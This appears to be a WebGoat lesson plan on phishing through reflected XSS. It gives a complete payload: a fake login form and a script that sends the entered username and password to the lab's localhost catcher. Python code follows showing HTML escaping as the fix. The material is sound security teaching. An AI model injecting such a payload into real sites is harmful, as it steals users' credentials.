Lesson Plan Title: Phishing with XSS

Concept / Topic To Teach:
It is always good practice to validate all input on the server side. XSS can occur when unvalidated user input is used in an HTTP response. With XSS an attacker can carry out a phishing attack and add content to a page that looks official. It is very hard for a victim to determine that the content is malicious.

General Goal(s):
The user should be able to add a form asking for a username and password. On submit, the input should be sent to http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName

Solution:
With XSS it is possible to add further elements to an existing page. This solution consists of two parts that you have to combine. A form with username and password fields could look like this:

<form><br><br><HR><H3>This feature requires account login:</H3><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name="pass"><br></form><br><br><HR>

Search for this term and you will see that a form is added to the page.

Now you need a script:

<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + " Password = " + document.forms[0].pass.value); var XSSImage = new Image(); XSSImage.src = "http://localhost/WebGoat/catcher?PROPERTY=yes&user=" + document.forms[0].user.value + "&password=" + document.forms[0].pass.value; } </script>

This script reads the input from the form and sends it to the WebGoat catcher.

The last step is to put things together. Add a button to the form that calls the script. You can do this with an onclick handler on the button, in this case onclick="hack()".

The final string looks like this:
<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + " Password = " + document.forms[0].pass.value); var XSSImage = new Image(); XSSImage.src = "http://localhost/WebGoat/catcher?PROPERTY=yes&user=" + document.forms[0].user.value + "&password=" + document.forms[0].pass.value; } </script><form><br><br><HR><H3>This feature requires account login:</H3><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name="pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

Search for this string and you will see a form asking for your username and password. Fill in these fields and click the Login button.
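The concept section above says the lesson works because the search page reflects the term into the HTTP response unvalidated. As an added example that is not part of the WebGoat lesson or its code, the Python below renders a search term the way the vulnerable page does and the way a fixed page should, using HTML-body-context output encoding; the reflecting template, the function names and the trimmed copy of the lesson's string are assumptions made for the demo.

```python
import html
import re

# Constructed sample input: a trimmed copy of the lesson's own string, a script
# block followed by a fake login form, as a user would type it into the search box.
LESSON_PAYLOAD = (
    '<script>function hack(){ /* reads the form and sends it to the catcher */ }</script>'
    '<form><H3>This feature requires account login:</H3>'
    'Enter Username:<br><input type="text" name="user">'
    '<input type="submit" value="login" onclick="hack()"></form>'
)


def render_search_vulnerable(term: str) -> str:
    """Hypothetical template standing in for the lesson's search page:
    reflects the term into the HTML body unchanged, which is the bug."""
    return f"<p>Results for: {term}</p>"


def render_search_safe(term: str) -> str:
    """Encodes the term for the HTML body context before reflecting it.

    html.escape turns < > & " ' into entities, so the browser displays the
    text the user typed but never parses it as markup or script. This is the
    right encoding for the body context only; a term placed inside an
    attribute, a URL or a <script> block needs that context's encoding.
    """
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


_TAG_NAME = re.compile(r"<\s*/?\s*([A-Za-z][A-Za-z0-9]*)")


def tag_names(rendered: str) -> list[str]:
    """Lists every tag a browser would parse from the rendered HTML.
    A demo check only: the fix is the encoding, not tag filtering."""
    return [name.lower() for name in _TAG_NAME.findall(rendered)]


def round_trips(term: str) -> bool:
    """True when decoding the safe output gives back exactly what was typed,
    i.e. encoding changed nothing the user sees, only what the parser sees."""
    inner = render_search_safe(term)[len("<p>Results for: "):-len("</p>")]
    return html.unescape(inner) == term


if __name__ == "__main__":
    print("vulnerable tags:", tag_names(render_search_vulnerable(LESSON_PAYLOAD)))
    print("safe tags:      ", tag_names(render_search_safe(LESSON_PAYLOAD)))
    print("round trip ok:  ", round_trips(LESSON_PAYLOAD))
```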